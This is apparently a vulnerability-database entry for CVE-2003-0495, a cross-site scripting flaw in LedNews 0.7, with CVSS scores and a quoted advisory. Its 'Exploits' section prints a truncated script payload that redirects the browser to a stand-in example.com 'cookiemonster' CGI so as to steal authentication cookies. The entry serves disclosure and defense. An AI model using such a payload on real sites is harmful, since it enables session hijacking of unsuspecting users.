4.3
CVSSv2

CVE-2003-0495

Published: 07/08/2003 Updated: 11/07/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) vulnerability in LedNews 0.7 allows remote malicious users to insert arbitrary web script via a news item.

Vulnerable Product Search on Vulmon Subscribe to Product

ledscripts.com lednews 0.7

Exploits

source: wwwsecurityfocuscom/bid/7920/info It has been reported that LedNews does not properly filter input from news posts Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities <script> documentlocationreplace('wwwexamplecom/cgi-bin/cookiemonstercgi? ...